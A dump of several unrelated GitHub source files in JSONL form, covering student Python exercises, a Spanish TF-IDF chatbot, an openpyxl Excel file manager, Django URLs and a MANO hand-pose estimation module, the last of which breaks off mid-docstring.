yoda.py\n### \n### Given an input of four words, returns the same four words in reverse order\n###\n### Author: Vladimir Hugec\n### Date: 1/30/18\n\nnotyoda = input(\"Enter a four word sentence: \")\nnotyetyoda = notyoda.split(\" \")\nnearlyyoda = list(reversed(notyetyoda))\n\nyoda = ''\nfor f in nearlyyoda:\n\tyoda = yoda + \" \" + f\n\nprint(yoda)\n","repo_name":"vladhugec/Course-Work","sub_path":"comp11 - intro/hw1/yoda.py","file_name":"yoda.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"31975498416","text":"import cv2 \nimport numpy as np\nimport math\nimport matplotlib.pyplot as mpimg\nfrom matplotlib import pyplot as plt\n\nIMG = cv2.imread('./img.jpg') #import Image\n\nZEROARRAY = np.zeros(IMG.shape, dtype=np.uint8)\n \ndef fill_255(x,y,w,h):\n ZEROARRAY[y:y+h,x:x+w] = 255\n \nfill_255(250,50,200,120) # X Y W H\n\n\nfig, plot = plt.subplots(1,3)\nfig.suptitle('Masked Image')\n\nim_rgb = cv2.cvtColor(IMG, cv2.COLOR_BGR2RGB) # convert to RGB\nplot[0].imshow(im_rgb)\nplot[0].set_title('ORIGINAL') \nplot[1].imshow(ZEROARRAY) \nplot[1].set_title('Image Mask')\nplot[2].imshow(cv2.bitwise_and(ZEROARRAY, im_rgb))\nplot[2].set_title('Bitwise_and Result')\n\n\nplt.show() # display plot\n\n","repo_name":"thanatath/Image_Processing_CLass_65","sub_path":"Activity#2/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3524866664","text":"# Importar las librerias\nimport random\nimport string\nimport warnings\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# TF-IDF: Term Frequency – Inverse Document Frequency\n\n# Descargar vocabulario auxiliar\n# nltk.download() => Abre la interfaz de usuario para ver y descargar el vocabulario\nnltk.download('popular', quiet=True)\nnltk.download('punkt', quiet=True)\nnltk.download('wordnet', quiet=True)\n\n# Variables de chat bot\nBOT_NAME = \"Bot\"\n\n# Keyword Matching for Greeting\nGREETING_INPUTS = (\"hola\", \"oye\", \"saludos\", \"que tal\",)\nGREETING_RESPONSES = [\"Hola\", \"Hola\",\"Encantado que estes chateando conmigo\", \"Estoy contento de que estés chateando conmigo\"]\n\n# Lee el contenido de ChatBot del archivo\nwith open('banco.txt', 'r', encoding='utf8', errors='ignore') as fin:\n raw = fin.read().lower()\n\n# Tokenizar contenido por oraciones\nsent_tokens = nltk.sent_tokenize(raw)\n\n# Fichas de lematización\ndef LemTokens(tokens):\n lemmer = WordNetLemmatizer()\n return [lemmer.lemmatize(token) for token in tokens]\n\n# Lematizar y normalizar texto\ndef LemNormalize(text):\n remove_punct_dict = dict((ord(punct), None)\n for punct in string.punctuation)\n return LemTokens(nltk.word_tokenize(text.lower().translate(remove_punct_dict)))\n\n# retorna un Greeting si el usuario envio un Greeting\ndef greeting(sentence):\n for word in sentence.split():\n if word.lower() in GREETING_INPUTS:\n return random.choice(GREETING_RESPONSES)\n\n# Procesar la entrada del usuario, obtener la respuesta y devolverla\ndef response(user_response):\n bot_response = ''\n\n # Procesar la entrada del usuario, obtener la respuesta y devolverla\n sent_tokens.append(user_response)\n\n # Crea y entrena un modelo de vectorizador Tf-Idf\n TfidfVec = TfidfVectorizer(tokenizer=LemNormalize, stop_words='english')\n tfidf = TfidfVec.fit_transform(sent_tokens)\n\n # Obtiene los valores más similares utilizando el método de similitud de coseno ([-1]: Last Item)\n vals = cosine_similarity(tfidf[-1], tfidf)\n\n # Gets The Answer Index to Pick From the Array ([-2]: Last 2 Items)\n idx = vals.argsort()[0][-2]\n\n # Obtiene la respuesta del index para elegir el array\n flat = vals.flatten()\n flat.sort()\n\n # Establece la respuesta del bot a la cadena de respuesta\n if(flat[-2] == 0):\n bot_response = bot_response + \"Lo siento pero no entiendo tu pregunta\"\n else:\n bot_response = bot_response+sent_tokens[idx]\n \n # Elimina la respuesta del usuario de la lista de tokens enviados\n sent_tokens.remove(user_response)\n\n # Devuelve la respuesta del bot\n return bot_response\n\n# Escribir texto al usuario\ndef talk_to_client(message):\n print(f\"{BOT_NAME}: \" + message)\n\n# Ejecuta el Chat Bot\nif __name__ == '__main__':\n flag = True\n talk_to_client(f\"Soy un {BOT_NAME}. Responderé a tus consultas sobre el ámbito financiero\")\n while(flag == True):\n talk_to_client(\n \"Escriba una pregunta sobre el ambito financiero. Si desea salir, escriba ¡Adiós!\")\n user_response = input()\n if(\"Adiós\" in user_response.lower()):\n flag = False\n talk_to_client(\"Adios! Cuidese...\")\n elif (\"gracias\" in user_response.lower()):\n talk_to_client(\"De nada..\")\n elif (greeting(user_response) != None):\n talk_to_client(greeting(user_response))\n else:\n talk_to_client(response(user_response))","repo_name":"FrankAldair/Chat_Bot","sub_path":"Chat.bot.py","file_name":"Chat.bot.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74928960134","text":"from sklearn import datasets\nfrom sklearn import tree\n\n# Carregar a Base de Dados\ndados = datasets.load_iris()\nX, Y, = dados.data, dados.target\n\n# Criar arvore\narvore = tree.DecisionTreeClassifier(max_depth=2, random_state=42)\narvore.fit(X, Y)\n\n# Fazer Classificacao de Registro\nregistro = [7, 3.2, 4.7, 1.4]\nnum_classe = arvore.predict([registro])[0]\nclasse = dados.target_names[num_classe]\nprint('Classificando Registro: ', registro)\nprint('Classe: ', classe)\n\nregistro2 = [9, 2.1, 2.3, 4.5]\nnum_classe = arvore.predict([registro2])[0]\nclasse = dados.target_names[num_classe]\nprint('Classificando Registro: ', registro2)\nprint('Classe 2: ', classe)\n\nregistro3 = [1, 7.1, 7.3, 7.5]\nnum_classe = arvore.predict([registro3])[0]\nclasse = dados.target_names[num_classe]\nprint('Classificando Registro: ', registro3)\nprint('Classe 3: ', classe)","repo_name":"area-41/Mineracao_de_Dados","sub_path":"ArvoreDecisao/ClassificacaoRegistro.py","file_name":"ClassificacaoRegistro.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21910220509","text":"cardapio = {'{coxinha}':5.00, '{pastel}':4.00, '{suco}':3.50, '{bolo}':4.50}\n\n\ndecisao = input('VC quer mudar o Cardapio? S ou N').upper()# passando tudo para maisculo\n\nwhile decisao == 'S':\n pergunta = input('Voce Deseja [A]Adicionar. [R]Remover [M]Modificar').upper()\n\n if pergunta == 'A':\n nome = input('Qual produto Deseja Adicionar?')\n valor = float(input('Qual o Valor desse Produto?'))\n cardapio[nome] = valor # q lista vai receber essa chave[nome] e adicionar o valor a ele\n\n elif decisao == 'R':\n nome = input('Qual produto deseja remover? ')# Chave para remoçao\n cardapio.pop(nome, 'não encontrado')# ??????\n\n elif decisao == 'M':\n nome = input('Qual o nome do produto que deseja alterar')# recebe essa chave\n valor = float(input('Qual sera o novo valor do produto {}? '.format(nome)))\n if cardapio.get(nome):\n cardapio[nome] = valor\n #cardapio.update(nome, valor)\n else:\n print('Nome invalido')\n else:\n print('A Opçao Escolhida é Invalida')\n\n decisao = input('\\n Você deseja fazer mais alguma modificação? ').upper()\n\nprint('\\n***************** C A R D Á P I O *****************')\nprint(cardapio)\n\n\n \n","repo_name":"ElizaMSOliveira/Fast-Cesar-School-Python","sub_path":"aula04Pratica03.py","file_name":"aula04Pratica03.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5570326520","text":"def take_skip(str_list, take_num, skip_num):\n taken_num = str_list[:take_num]\n return taken_num\n\n\ndef update_str_list(str_list, take_num, skip_num):\n str_list = str_list[take_num:]\n str_list = str_list[skip_num:]\n return str_list\n\n\nstring = input()\nstr_list = []\nnumber_list = []\n\nfor letter in string:\n if letter.isnumeric():\n number_list.append(letter)\n else:\n str_list.append(letter)\n\nnumber_list = [int(num) for num in number_list]\n\ntake_list = [number_list[num] for num in range(len(number_list)) if num % 2 == 0]\nskip_list = [number_list[num] for num in range(len(number_list)) if num % 2 != 0]\n\nresult_list = []\n\nfor index in range(len(take_list)):\n take_num = take_list[index]\n skip_num = skip_list[index]\n taken_part = take_skip(str_list, take_num, skip_num)\n new_list = update_str_list(str_list, take_num, skip_num)\n str_list = new_list\n result_list.append(taken_part)\n\nresult_list = [''.join(ch) for ch in result_list]\nprint(''.join(result_list))","repo_name":"Svilkata88/SoftUni_python_fundamentials","sub_path":"05_2_2_list_advance_more_exercise/02_take_skip_rope.py","file_name":"02_take_skip_rope.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14274709226","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport time\nfrom openpyxl import load_workbook\nfrom openpyxl.utils import datetime\n\nfrom DataManager import DataManager as DataManager\n\nclass XlManager():\n '''\n 实现Excel读写的功能\n '''\n # 当前加载的Excel文件\n CUR_WB = None\n\n @classmethod\n def load_cur_file(cls,fp):\n '''\n 加载当前使用的Excel文件,供随时访问\n @param fp: Excel文件路径\n '''\n fp = os.path.normcase(fp)\n if os.path.exists(fp):\n cls.CUR_WB = load_workbook(filename = fp)\n\n @classmethod\n def fetch_name(cls,defined_name,is_return_cell=False):\n '''\n 从当前的Excel文件中,加载名称对应的数据\n @param defined_name: Excel中定义的名称\n @param is_return_cell: 是否返回cell对象\n @return: cell对象或列表;泛型数值或列表\n '''\n if not cls.CUR_WB:return\n dn = cls.CUR_WB.defined_names[defined_name]\n cells = []\n for k,v in dn.destinations:\n ws = cls.CUR_WB[k]\n cells.append(ws[v])\n cells = cells[0] # 去掉无用的列表层\n # 返回cell对象\n if is_return_cell:\n return cells\n # 返回值\n if type(cells) is tuple: # 区域\n return [ cell.value\n for cell in cells\n if cell.value\n ][1:]\n else: # 单独单元格\n return cells.value\n\n @classmethod\n def load_excel_data(cls,CFG):\n '''\n 加载Excel文件中的数据\n @param CFG: 配置信息,来自ConfManager\n @return: 文件数据字典\n '''\n workbook = load_workbook(filename = CFG.BASE['EXCEL_FILE_PATH'], read_only=True)\n sheet_name = CFG.BASE['LIST_SHEET_NAME']\n if sheet_name not in workbook.sheetnames:\n raise Exception('Excel file wrong!')\n ws = workbook[sheet_name]\n # 先快速从表格读取数据为列表\n data = []\n is_start = False\n for row in ws.rows:\n cur_list = []\n for cell in row:\n if not is_start and cell.value == 'key':\n is_start = True\n if cell.value and cell.is_date: # 处理Excel中记录的时间\n new_value = datetime.to_excel(cell.value)\n else:\n new_value = cell.value\n cur_list.append(new_value)\n if is_start:\n data.append(cur_list)\n workbook.close()\n # 列表转为字典\n excel_data = {}\n headers = data[0]\n for row in data[2:]:\n cur_dic = {}\n for num,value in enumerate(row):\n # 跳过key以及没有值的单元格\n if num == 0 or value is None:continue\n cur_dic[headers[num]] = value\n # 确定key\n list_keys = excel_data.keys()\n if row[0]:\n cur_key = row[0]\n else:\n cur_key = None\n key = DataManager.get_key(cur_dic,CFG,list_keys,cur_key)\n # 数据记录\n excel_data[key] = cur_dic\n # 强制备份Excel数据\n DataManager.backup_data(excel_data)\n return excel_data\n\n @classmethod\n def write_data_to_excel(cls,data,CFG):\n '''\n 写入最终数据至Excel文件中\n @param data: 待写入data(来自FileManager的处理结果)\n @param CFG: 配置信息,来自ConfManager\n '''\n workbook = cls.CUR_WB\n sheet_name = CFG.BASE['LIST_SHEET_NAME']\n if sheet_name not in workbook.sheetnames:\n raise Exception('Excel file wrong!')\n # sheet备份(自动加顺序号)\n if CFG.EXCEL['AUTO_BACKUP']:\n sheet_copy = workbook.copy_worksheet(workbook[sheet_name])\n # 使用原sheet\n ws = workbook[sheet_name]\n # 表头提取\n head_start_cell = cls.get_cell_by_value(ws,'key')\n head_row = ws[head_start_cell.row]\n # 根据表头确定输出字段顺序\n output_params = [cell.value for cell in head_row]\n # 清空无用表格行(保留表头下方文字表头行)\n ws.delete_rows(head_start_cell.row + 2, ws.max_row)\n # 按顺序输出\n p_row = head_start_cell.row + 2 # row指针\n for k,v in data.items():\n p_col = head_start_cell.column # col指针\n for item in output_params:\n # 输出key\n if item == 'key':\n cur_v = k\n # 自动套用公式\n elif item == 'folder_link':\n ref_path = ws.cell(p_row,output_params.index('path')+1).coordinate\n cur_v = f'=HYPERLINK(BASE_FOLDER&\"/\"&{ref_path},\"打开\")'\n elif item == 'file_link':\n ref_path = ws.cell(p_row,output_params.index('path')+1).coordinate\n ref_filename = ws.cell(p_row,output_params.index('filename')+1).coordinate\n ref_ext = ws.cell(p_row,output_params.index('ext')+1).coordinate\n cur_v = f'=HYPERLINK(BASE_FOLDER&\"/\"&{ref_path}&\"/\"&{ref_filename}&\".\"&{ref_ext},\"打开\")'\n elif item == 'filetype':\n ref_cell_addr = ws.cell(p_row,output_params.index('ext')+1).coordinate\n cur_v = f'=IFERROR(VLOOKUP({ref_cell_addr},rEXT_TO_TYPE,2,),\"\")'\n # 时间戳处理\n elif item in ('c_time','m_time','a_time'):\n cur_timestamp = v.get(item.replace('_',''))\n if cur_timestamp:\n cur_v = cls.timestamp_to_str(cur_timestamp)\n else:\n cur_v = ''\n # 正常输出各字段\n else:\n cur_v = v.get(item,'') # 留空不存在数据\n cur_cell = ws.cell(\n column = p_col,\n row = p_row,\n value = cur_v,\n )\n p_col += 1\n p_row += 1\n # 存储\n workbook.save(CFG.BASE['EXCEL_FILE_PATH'])\n\n @staticmethod\n def get_cell_by_value(sheet,value):\n '''\n 按值获取单元格对象(先横后纵,取第一个值)\n @param sheet: 值所在的Excel工作表\n @param value: 所需的值\n @return: cell对象\n '''\n for row in sheet.iter_rows():\n for cell in row:\n if cell.value == value:\n return cell\n\n @staticmethod\n def is_excel_opened(fp):\n '''\n 判断Excel文件是否已打开(通过是否生成了~$文件判定)\n @param fp: Excel文件路径\n @return: bool\n '''\n fp = os.path.normcase(fp)\n dir_name,file_name = os.path.split(fp)\n hidden_fp = os.path.join(dir_name,'~$' + file_name)\n return os.path.exists(hidden_fp)\n\n @staticmethod\n def timestamp_to_str(timestamp):\n '''\n 时间戳转字符串时间\n @param timestamp: 时间戳\n @return: 字符串时间\n '''\n time_array = time.localtime(timestamp)\n return time.strftime('%Y-%m-%d %H:%M:%S',time_array)\n\n\nif __name__ == '__main__':\n XlManager.load_cur_file('FileManager.xlsx')\n res = XlManager.fetch_name('NO_HIDDEN_FILES_WIN')\n print(res)\n res = XlManager.fetch_name('rEXT_WHITELIST')\n print(res)\n","repo_name":"gamefang/file_manager","sub_path":"XlManager.py","file_name":"XlManager.py","file_ext":"py","file_size_in_byte":7540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22569854322","text":"from django.urls import path, include\nfrom core_api.views.user_views import UserListView, UserDetailView, SchoolAdminListView, SchoolAdminDetailView\n\napp_name = 'core_api'\n\nurlpatterns = [\n path('exams/', include('exams.urls', namespace='exams')),\n path('users/', include('users.urls', namespace='users')),\n path('fees/', include('fees.urls', namespace='fees')),\n path('schools/', include('school.urls', namespace='schools')),\n]\n","repo_name":"JesseZack/smartSchool","sub_path":"core_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16176302585","text":"def signal_strength(file_name):\n cycle, cycles, reg_val, result = 0, {}, 1, 0\n\n def sum_result(total=0):\n if any([cycle == 20, ((cycle - 20) % 40) == 0]):\n cycles[cycle] = reg_val\n total += cycle * reg_val\n return total\n\n with open(file_name, 'r') as infile:\n for line in infile:\n line = [(int(x) if (x.isdigit() or x[0] == '-') else x)\n for x in line.strip().split(' ')]\n cycle += 1\n result += sum_result()\n if line[0] == 'addx':\n cycle += 1\n result += sum_result()\n reg_val += line[1]\n if len(cycles) == 6:\n return result\n\n\nprint(signal_strength(\"AOC22_D10_inp.txt\"))\n","repo_name":"JHarrisJoshua/Coding_Challenges","sub_path":"AOC/2022/06-10/AOC22_D10_A.py","file_name":"AOC22_D10_A.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38259857585","text":"\"\"\"Record mapping for a marker-based motion capture system.\n\nEstimates MANO states from marker positions.\n\"\"\"\nimport warnings\n\nimport numpy as np\nfrom pytransform3d import transformations as pt, rotations as pr\nfrom scipy.optimize import minimize\nfrom .mano import HandState, hand_vertices, apply_shape_parameters\nfrom .timing import TimeableMixin\n\n\n# TODO this probably has to be redefined and we have to make sure that this\n# is the same for all tests\nMANO2HAND_MARKERS = pt.invert_transform(pt.transform_from(\n R=pr.active_matrix_from_intrinsic_euler_xyz(np.deg2rad([-5, 97, 0])),\n p=np.array([0.0, -0.03, 0.065])))\n\n\nVERTEX_OFFSET = 0.007 # marker radius: 0.006\nMANO_CONFIG = {\n \"pose_parameters_per_finger\":\n {\n \"thumb\": np.arange(39, 48),\n \"index\": np.arange(3, 12),\n \"middle\": np.arange(12, 21),\n \"ring\": np.arange(30, 39),\n \"little\": np.arange(21, 30),\n },\n \"vertex_indices_per_finger\":\n {\n \"thumb\": [724, # tip\n 706, # middle\n ],\n \"index\": [314, # tip\n 261, # middle\n ],\n \"middle\": [426, # tip\n 399, # middle\n ],\n \"little\": [651, # tip\n 627, # middle\n ],\n \"ring\": [534, # tip\n 509, # middle\n ],\n },\n \"joint_indices_per_finger\":\n {\n \"thumb\": (13, 14, 15),\n \"index\": (1, 2, 3),\n \"middle\": (4, 5, 6),\n \"ring\": (10, 11, 12),\n \"little\": (7, 8, 9)\n },\n \"tip_vertex_offsets_per_finger\":\n {\n \"thumb\": [np.array([0.006, 0.006, 0.003]),\n np.array([0.006, 0.006, 0.003])],\n \"index\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])],\n \"middle\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])],\n \"ring\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])],\n \"little\": [np.array([0, VERTEX_OFFSET, 0]),\n np.array([0, VERTEX_OFFSET, 0])]\n },\n \"action_weights_per_finger\":\n {\n \"thumb\": # roll -l/+r -ext/+flex\n np.array([[0.01, 0.01, 0.01, # + positive\n 0.01, 0.01, 0.01,\n 0.01, 0.05, 0.05],\n [0.01, 0.01, 0.01, # - negative\n 0.01, 0.01, 0.01,\n 0.01, 0.05, 0.05]]),\n \"index\":\n np.array([[0.1, 0.001, 0.001, # close to palm\n 0.1, 0.05, 0.001, # middle joint\n 0.1, 0.05, 0.001], # tip joint\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.003,\n 0.1, 0.05, 0.005]]),\n \"middle\":\n np.array([[0.1, 0.001, 0.001,\n 0.1, 0.01, 0.001,\n 0.1, 0.01, 0.001],\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.005,\n 0.1, 0.05, 0.005]]),\n \"ring\":\n np.array([[0.1, 0.001, 0.001,\n 0.1, 0.01, 0.001,\n 0.1, 0.01, 0.001],\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.005,\n 0.1, 0.05, 0.005]]),\n \"little\":\n np.array([[0.1, 0.001, 0.001,\n 0.1, 0.01, 0.001,\n 0.1, 0.01, 0.001],\n [0.1, 0.001, 0.001,\n 0.1, 0.05, 0.005,\n 0.1, 0.05, 0.005]]),\n }\n}\n\n\ndef make_finger_kinematics(hand_state, finger_name, mano_config=MANO_CONFIG):\n return ManoFingerKinematics(\n hand_state,\n mano_config[\"pose_parameters_per_finger\"][finger_name],\n mano_config[\"vertex_indices_per_finger\"][finger_name],\n mano_config[\"joint_indices_per_finger\"][finger_name],\n mano_config[\"action_weights_per_finger\"][finger_name],\n mano_config[\"tip_vertex_offsets_per_finger\"][finger_name])\n\n\nclass MarkerBasedRecordMapping(TimeableMixin):\n \"\"\"Estimates pose of hand and finger configuration based on markers.\n\n We estimate the pose parameters of a MANO hand model from a marker-based\n motion capture system such as the Qualisys system.\n\n Parameters\n ----------\n left : bool, optional (default: False)\n Left hand. Right hand otherwise.\n\n mano2hand_markers : array-like, shape (4, 4)\n Transform from MANO model to hand markers.\n\n shape_parameters : array-like, shape (10,)\n Shape parameters for MANO hand.\n\n hand_state : mocap.mano.HandState, optional (default: None)\n If there is already a hand state object, this can be reused for the\n record mapping. Otherwise we will create a new one.\n\n record_mapping_config : dict, optional (default: None)\n Configuration of record mapping.\n\n use_fingers : tuple of str, optional (default: ('thumb', 'index', 'middle', 'ring', 'little'))\n Fingers for which we compute the record mapping.\n\n verbose : int, optional (default: 0)\n Verbosity level\n\n measure_time : bool\n Measure computation time for each frame.\n\n Attributes\n ----------\n finger_names_ : set of str\n Fingers for which we compute the record mapping.\n\n hand_state_ : mocap.mano.HandState\n MANO hand state. This state will be updated by the record mapping\n and should be used to perform a subsequent embodiment mapping based\n on the current state.\n\n mano_finger_kinematics_ : dict (str to ManoFingerKinematics)\n Maps finger names to their kinematic chain in the MANO model.\n\n mano2hand_markers_ : array-like, shape (4, 4)\n Transformation from MANO base frame to marker base frame.\n\n mano2world_ : array-like, shape (4, 4)\n MANO base pose in world frame.\n \"\"\"\n def __init__(\n self, left=False, mano2hand_markers=None, shape_parameters=None,\n hand_state=None, record_mapping_config=None,\n use_fingers=(\"thumb\", \"index\", \"middle\", \"ring\", \"little\"),\n verbose=0, measure_time=False):\n super(MarkerBasedRecordMapping, self).__init__(verbose or measure_time)\n self.finger_names_ = set(use_fingers)\n\n if hand_state is None:\n self.hand_state_ = HandState(left=left)\n if shape_parameters is not None:\n self.hand_state_.betas[:] = shape_parameters\n self.hand_state_.pose_parameters[\"J\"], \\\n self.hand_state_.pose_parameters[\"v_template\"] = \\\n apply_shape_parameters(betas=shape_parameters,\n **self.hand_state_.shape_parameters)\n else:\n self.hand_state_ = hand_state\n\n self.verbose = verbose\n\n if record_mapping_config is None:\n record_mapping_config = MANO_CONFIG\n\n self.mano_finger_kinematics_ = {\n finger_name: make_finger_kinematics(\n self.hand_state_, finger_name, record_mapping_config)\n for finger_name in self.finger_names_\n }\n\n if mano2hand_markers is None:\n self.mano2hand_markers_ = MANO2HAND_MARKERS\n else:\n self.mano2hand_markers_ = mano2hand_markers\n self.current_hand_markers2world = np.eye(4)\n self.mano2world_ = pt.concat(\n self.mano2hand_markers_, self.current_hand_markers2world)\n self.markers_in_mano = {\n finger_name: None for finger_name in self.mano_finger_kinematics_}\n\n def reset(self):\n \"\"\"Reset current joint poses of MANO.\"\"\"\n for finger_name in self.mano_finger_kinematics_:\n self.mano_finger_kinematics_[finger_name].reset()\n\n def estimate(self, hand_markers, finger_markers):\n \"\"\"Estimate hand state from positions of hand markers and finger markers.\n\n Parameters\n ----------\n hand_markers : list\n Markers on hand in order 'hand_top', 'hand_left', 'hand_right'.\n\n finger_markers : dict (str to array-like)\n Positions of markers on fingers.\n \"\"\"\n current_hand_markers2world = estimate_hand_pose(*hand_markers)\n if np.any(np.isnan(current_hand_markers2world)):\n warnings.warn(\n \"[MarkerBasedRecordMapping] Cannot estimate hand pose. \"\n \"Detected NaN.\")\n else:\n self.current_hand_markers2world = current_hand_markers2world\n self.mano2world_ = pt.concat(\n self.mano2hand_markers_, self.current_hand_markers2world)\n\n available_fingers = self.finger_names_.intersection(\n finger_markers.keys())\n\n world2mano = pt.invert_transform(self.mano2world_, check=False)\n for finger_name in available_fingers:\n markers_in_world = np.atleast_2d(finger_markers[finger_name])\n self.markers_in_mano[finger_name] = np.dot(\n pt.vectors_to_points(markers_in_world), world2mano.T)[:, :3]\n\n self.start_measurement()\n\n for finger_name in available_fingers:\n fe = self.mano_finger_kinematics_[finger_name]\n finger_pose = fe.inverse(self.markers_in_mano[finger_name])\n self.hand_state_.pose[fe.finger_pose_param_indices] = finger_pose\n\n \"\"\"# joblib parallelization, not faster because of overhead for data transfer\n import joblib\n def estimate_finger_pose(finger_estimator, measurement):\n finger_pose = finger_estimator.estimate(measurement)\n return finger_estimator.finger_pose_param_indices, finger_pose\n\n results = joblib.Parallel(n_jobs=-1)(\n joblib.delayed(estimate_finger_pose)(self.finger_estimators[finger_name],\n self.finger_markers_in_mano[finger_name])\n for finger_name in self.finger_estimators.keys())\n for pose_indices, pose in results:\n self.hand_state.pose[pose_indices] = pose\n #\"\"\"\n\n self.stop_measurement()\n if self.verbose:\n print(f\"[{type(self).__name__}] Time for optimization: \"\n f\"{self.last_timing():.4f} s\")\n\n self.hand_state_.recompute_mesh(self.mano2world_)\n\n\ndef estimate_hand_pose(hand_top, hand_left, hand_right):\n \"\"\"Estimate pose of the hand from markers on the back of the hand.\n\n To estimate the pose of the MANO frame in world frame, we first derive\n the pose of the hand based on three labeled markers on the back of the\n hand. In accordance with the two-vector representation (see Corke:\n Robotics, Vision and Control), we define the hand frame orientation by\n the approach vector (direction from right to front hand marker) and\n the orientation vector (normal of the plane defined by the three\n markers). The origin of the hand frame can be any point in the plane of\n the three markers. We choose the right marker.\n\n Parameters\n ----------\n hand_top : array, shape (3,)\n Position of hand_top marker.\n\n hand_left : array, shape (3,)\n Position of hand_left marker.\n\n hand_right : array, shape (3,)\n Position of hand_right marker.\n\n Returns\n -------\n hand_markers2world : array, shape (4, 4)\n Pose of hand marker frame.\n \"\"\"\n right2left = hand_left - hand_right\n approach = pr.norm_vector(hand_top - hand_right)\n orientation = pr.norm_vector(np.cross(approach, right2left))\n normal = np.cross(orientation, approach)\n hand_pose = np.eye(4)\n hand_pose[:3, :3] = np.column_stack((normal, orientation, approach))\n hand_pose[:3, 3] = hand_right\n return hand_pose\n\n\nclass ManoFingerKinematics:\n \"\"\"Estimates the state of a finger.\n\n Parameters\n ----------\n hand_state : HandState\n State of the hand mesh.\n\n finger_pose_param_indices : array, shape (n_finger_joints * 3,)\n Indices of pose parameters of this finger.\n\n finger_vertex_indices : list of int\n Indices of the vertices of which we will optimize the position.\n\n finger_joint_indices : array, shape (n_finger_joints,)\n Indices of joints that correspond to this finger.\n\n action_weights : array, shape (2, n_finger_joints * 3)\n Default weight of action penalty in error function for fingers.\n\n tip_vertex_offsets : list of array\n Offsets of vertex with respect to original vertex in MANO base frame.\n \"\"\"\n def __init__(self, hand_state, finger_pose_param_indices,\n finger_vertex_indices, finger_joint_indices, action_weights,\n tip_vertex_offsets):\n self.finger_pose_param_indices = finger_pose_param_indices\n self.finger_vertex_indices = finger_vertex_indices\n self.finger_joint_indices = np.asarray(\n [0] + list(finger_joint_indices)).astype(dtype=int)\n self.tip_vertex_offsets = tip_vertex_offsets\n\n self.all_finger_vertex_indices = self._search_similar_vertices(\n finger_pose_param_indices, hand_state)\n\n self.finger_pose_params, self.finger_opt_vertex_indices = \\\n self.reduce_pose_parameters(hand_state)\n self.finger_error = FingerError(self.forward, action_weights)\n\n self.current_pose = np.zeros_like(\n self.finger_pose_param_indices).astype(dtype=float)\n\n self._optimizer_pose = np.zeros(len(self.current_pose) + 3)\n self.bounds = np.array([\n [-0.4 * np.pi, 0.4 * np.pi]] * len(self.current_pose))\n\n self.last_forward_result = None\n\n def _search_similar_vertices(self, finger_pose_param_indices, hand_state):\n # search for vertices that are influenced by the same pose parameters\n # TODO mapping to indices of weights might be correct by accident\n return np.unique(np.nonzero(\n hand_state.pose_parameters[\"weights\"][\n :, np.unique(finger_pose_param_indices // 3)])[0])\n\n def reset(self):\n \"\"\"Set all joint angles of the finger to 0.\"\"\"\n self.current_pose[:] = 0.0\n\n def reduce_pose_parameters(self, hand_state):\n \"\"\"Reduce parameters of the MANO model to this finger.\n\n Parameters\n ----------\n hand_state : HandState\n State of the hand mesh.\n\n Returns\n -------\n pose_params : dict\n Reduced set of pose parameters of MANO. Contains fields 'J',\n 'weights', 'kintree_table', 'v_template', 'posedirs'.\n\n finger_opt_vertex_indices : list\n Indices of vertices that will be used during numerical inverse\n kinematics of this finger.\n \"\"\"\n finger_opt_vertex_indices = []\n for idx in self.finger_vertex_indices:\n match = np.where(self.all_finger_vertex_indices == idx)[0]\n if not match:\n raise ValueError(\n f\"Vertex with index {idx} does not belong to this finger. \"\n f\"Possible options: {self.all_finger_vertex_indices}\")\n finger_opt_vertex_indices.append(match[0])\n pose_dir_joint_indices = np.hstack([np.arange(i, i + 9) for i in self.finger_joint_indices[1:]]).astype(int)\n\n v_template = hand_state.pose_parameters[\"v_template\"][self.finger_vertex_indices].copy()\n for i in range(len(v_template)):\n v_template[i] += self.tip_vertex_offsets[i]\n\n pose_params = {\n \"J\": hand_state.pose_parameters[\"J\"][self.finger_joint_indices],\n \"weights\": hand_state.pose_parameters[\"weights\"][self.finger_vertex_indices][:, self.finger_joint_indices],\n \"kintree_table\": hand_state.pose_parameters[\"kintree_table\"][:, self.finger_joint_indices], # TODO maybe this does not work in general\n \"v_template\": v_template,\n \"posedirs\": hand_state.pose_parameters[\"posedirs\"][self.finger_vertex_indices][:, :, pose_dir_joint_indices]\n }\n return pose_params, finger_opt_vertex_indices\n\n def has_cached_forward_kinematics(self):\n \"\"\"Check if this object has a cached forward kinematics result.\"\"\"\n return self.last_forward_result is not None\n\n def forward(self, pose=None, return_cached_result=False):\n \"\"\"Compute position at the tip of the finger for given joint parameters.\n\n Parameters\n ----------\n pose : array, shape (n_finger_joints * 3,), optional 